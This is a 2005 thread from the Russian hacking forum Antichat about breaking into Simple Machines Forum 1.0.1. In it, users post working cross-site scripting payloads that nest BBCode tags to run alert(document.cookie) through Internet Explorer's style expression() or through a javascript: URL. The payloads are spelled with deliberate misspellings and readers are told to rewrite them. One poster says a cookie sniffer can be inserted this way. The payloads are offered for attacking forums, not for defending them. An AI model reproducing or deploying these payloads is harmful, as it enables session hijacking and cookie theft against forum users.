Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   SMF 1.0.1. (Simple Machines Forum) (https://forum.antichat.xyz/showthread.php?t=5812)

FST 02.04.2005 18:59
SMF 1.0.1. (Simple Machines Forum)
 
Ломаю голову уже какой день и никак дыру найти не могу :( Может кто-то уже сталкивался? Вот пример форума. Этот форум ломать не обязательно :D

KEZ 02.04.2005 19:17
Дай мне линк на исходники

fahrenheit 02.04.2005 19:23
http://www.simplemachines.org/downlo...-3_install.zip

fahrenheit 02.04.2005 19:26
Чего то и мне ломаку стало интересно поискать уязвимость )
Это же какое счатье потом если найдеш))

KEZ 02.04.2005 19:55
Мда... ну и форум.
В первыем минуты мне показалось что он сверх-защищеный. (по обилию тегов)

Через 2 минуты я уже выделил две самых простых XSS. Их хватит. Если нет - берите ещё. Я сделаю видео.

Код:
[urл=http://a[еmail=s=`]a[/еmail]]a[/urл]`xss=`alert(document.cookie);this.xss=null`
style=top:expression(eval(this.xss));

[iмg]http://[urл=http://s=`]aaaaa[/urл][/iмg]`xss=`alert(document.cookie);this.xss=null`
style=top:expression(eval(this.xss));
ВНИМАНИЕ! Чтобы НАШ ФОРУМ не парсил (не зависимо от тега [СODE]) мой код, я НАМЕРЕННО написал URL через Л. И емейл тоже так написал.
ПЕРЕПИШИТЕ САМИ!

Algol 02.04.2005 19:58
Спаренные теги в правильном исполнении:
Код HTML:
[img]http://s.d[email]sa@sa/style=background:url(javascript:alert());[/img][/email]

Algol 02.04.2005 20:01
Цитата:
Через 2 минуты я уже выделил две самых простых XSS.
Кстати, ты зря везде пихаешь знак `.
Ведь он прокатывает только в IE.
Если можно обойтись без него, то лучше его не использовать.

KEZ 02.04.2005 20:47
Ну... это как сказать.
У меня все правильно. И снифер вставляется. Я проверял.
Расчитано на то что Ie. Сейчас большинство его используют
Так что нельзя назвать мое исполнение неправильным

FST 02.04.2005 22:59
Цитата:
Сообщение от KEZ
Мда... ну и форум.
В первыем минуты мне показалось что он сверх-защищеный. (по обилию тегов)

Через 2 минуты я уже выделил две самых простых XSS. Их хватит. Если нет - берите ещё. Я сделаю видео.

Код:
[urл=http://a[еmail=s=`]a[/еmail]]a[/urл]`xss=`alert(document.cookie);this.xss=null`
style=top:expression(eval(this.xss));

[iмg]http://[urл=http://s=`]aaaaa[/urл][/iмg]`xss=`alert(document.cookie);this.xss=null`
style=top:expression(eval(this.xss));
ВНИМАНИЕ! Чтобы НАШ ФОРУМ не парсил (не зависимо от тега [СODE]) мой код, я НАМЕРЕННО написал URL через Л. И емейл тоже так написал.
ПЕРЕПИШИТЕ САМИ!
Во, да ты дайшь басу :D :D Буду ждать ролик! Респект. Я день потратил и ничего не нашёл :(

Ссылочку на видео не забудь оставить :rolleyes:

FST 06.04.2005 15:17
Гррр, что-то я видео ролика обещенного не вижу !


Время: 21:20
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице